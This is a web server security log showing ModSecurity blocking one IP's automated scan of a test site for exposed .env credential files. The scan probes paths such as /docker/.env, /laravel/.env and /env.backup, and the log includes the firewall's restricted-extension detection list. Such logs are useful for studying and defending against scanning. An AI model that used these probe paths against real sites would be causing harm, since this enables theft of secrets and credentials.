[Wed Jan 07 03:49:59.268621 2026] [:error] [pid 1248391] [client 45.148.10.159:43286] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aV3J1zNvD-ZISLd-2fIwtQAAAAI"]
[Wed Jan 07 03:49:59.268849 2026] [:error] [pid 1248391] [client 45.148.10.159:43286] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aV3J1zNvD-ZISLd-2fIwtQAAAAI"]
[Wed Jan 07 03:49:59.269007 2026] [:error] [pid 1248391] [client 45.148.10.159:43286] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aV3J1zNvD-ZISLd-2fIwtQAAAAI"]
[Wed Jan 07 03:50:08.609862 2026] [:error] [pid 1248390] [client 45.148.10.159:36908] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aV3J4MEIxEbNfU6y2MWMogAAAAE"]
[Wed Jan 07 03:50:08.610150 2026] [:error] [pid 1248390] [client 45.148.10.159:36908] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aV3J4MEIxEbNfU6y2MWMogAAAAE"]
[Wed Jan 07 03:50:08.610303 2026] [:error] [pid 1248390] [client 45.148.10.159:36908] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aV3J4MEIxEbNfU6y2MWMogAAAAE"]
[Wed Jan 07 03:50:14.538865 2026] [:error] [pid 1248392] [client 45.148.10.159:36916] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J5hbsuCSf9NTQ9s_0VwAAAAM"]
[Wed Jan 07 03:50:14.539103 2026] [:error] [pid 1248392] [client 45.148.10.159:36916] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J5hbsuCSf9NTQ9s_0VwAAAAM"]
[Wed Jan 07 03:50:14.539262 2026] [:error] [pid 1248392] [client 45.148.10.159:36916] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J5hbsuCSf9NTQ9s_0VwAAAAM"]
[Wed Jan 07 03:50:21.931248 2026] [:error] [pid 1248394] [client 45.148.10.159:59136] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J7SKP3LfiSmVjqw0tPAAAAAU"]
[Wed Jan 07 03:50:21.931472 2026] [:error] [pid 1248394] [client 45.148.10.159:59136] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J7SKP3LfiSmVjqw0tPAAAAAU"]
[Wed Jan 07 03:50:21.931642 2026] [:error] [pid 1248394] [client 45.148.10.159:59136] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J7SKP3LfiSmVjqw0tPAAAAAU"]
[Wed Jan 07 03:50:25.820756 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J8QF561dl39d9DvqUXAAAAAc"]
[Wed Jan 07 03:50:25.821039 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J8QF561dl39d9DvqUXAAAAAc"]
[Wed Jan 07 03:50:25.821269 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aV3J8QF561dl39d9DvqUXAAAAAc"]
[Wed Jan 07 03:50:25.851206 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aV3J8QF561dl39d9DvqUXQAAAAc"]
[Wed Jan 07 03:50:25.851475 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aV3J8QF561dl39d9DvqUXQAAAAc"]
[Wed Jan 07 03:50:25.851631 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aV3J8QF561dl39d9DvqUXQAAAAc"]
[Wed Jan 07 03:50:26.041221 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aV3J8gF561dl39d9DvqUYgAAAAc"]
[Wed Jan 07 03:50:26.041433 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aV3J8gF561dl39d9DvqUYgAAAAc"]
[Wed Jan 07 03:50:26.041597 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aV3J8gF561dl39d9DvqUYgAAAAc"]
[Wed Jan 07 03:50:26.079824 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aV3J8gF561dl39d9DvqUYwAAAAc"]
[Wed Jan 07 03:50:26.080030 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aV3J8gF561dl39d9DvqUYwAAAAc"]
[Wed Jan 07 03:50:26.080188 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aV3J8gF561dl39d9DvqUYwAAAAc"]
[Wed Jan 07 03:50:26.121451 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aV3J8gF561dl39d9DvqUZAAAAAc"]
[Wed Jan 07 03:50:26.121796 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aV3J8gF561dl39d9DvqUZAAAAAc"]
[Wed Jan 07 03:50:26.122047 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aV3J8gF561dl39d9DvqUZAAAAAc"]
[Wed Jan 07 03:50:26.155111 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aV3J8gF561dl39d9DvqUZQAAAAc"]
[Wed Jan 07 03:50:26.155314 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aV3J8gF561dl39d9DvqUZQAAAAc"]
[Wed Jan 07 03:50:26.155467 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aV3J8gF561dl39d9DvqUZQAAAAc"]
[Wed Jan 07 03:50:26.196158 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aV3J8gF561dl39d9DvqUZgAAAAc"]
[Wed Jan 07 03:50:26.196394 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aV3J8gF561dl39d9DvqUZgAAAAc"]
[Wed Jan 07 03:50:26.196550 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aV3J8gF561dl39d9DvqUZgAAAAc"]
[Wed Jan 07 03:50:26.229133 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aV3J8gF561dl39d9DvqUZwAAAAc"]
[Wed Jan 07 03:50:26.229327 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aV3J8gF561dl39d9DvqUZwAAAAc"]
[Wed Jan 07 03:50:26.229475 2026] [:error] [pid 1249076] [client 45.148.10.159:59140] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aV3J8gF561dl39d9DvqUZwAAAAc"]
[Wed Jan 07 03:50:26.340147 2026] [:error] [pid 1248393] [client 45.148.10.159:59156] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aV3J8heYWvWJmu8YY0xpQwAAAAQ"]
[Wed Jan 07 03:50:26.340411 2026] [:error] [pid 1248393] [client 45.148.10.159:59156] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aV3J8heYWvWJmu8YY0xpQwAAAAQ"]
[Wed Jan 07 03:50:26.340598 2026] [:error] [pid 1248393] [client 45.148.10.159:59156] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aV3J8heYWvWJmu8YY0xpQwAAAAQ"]
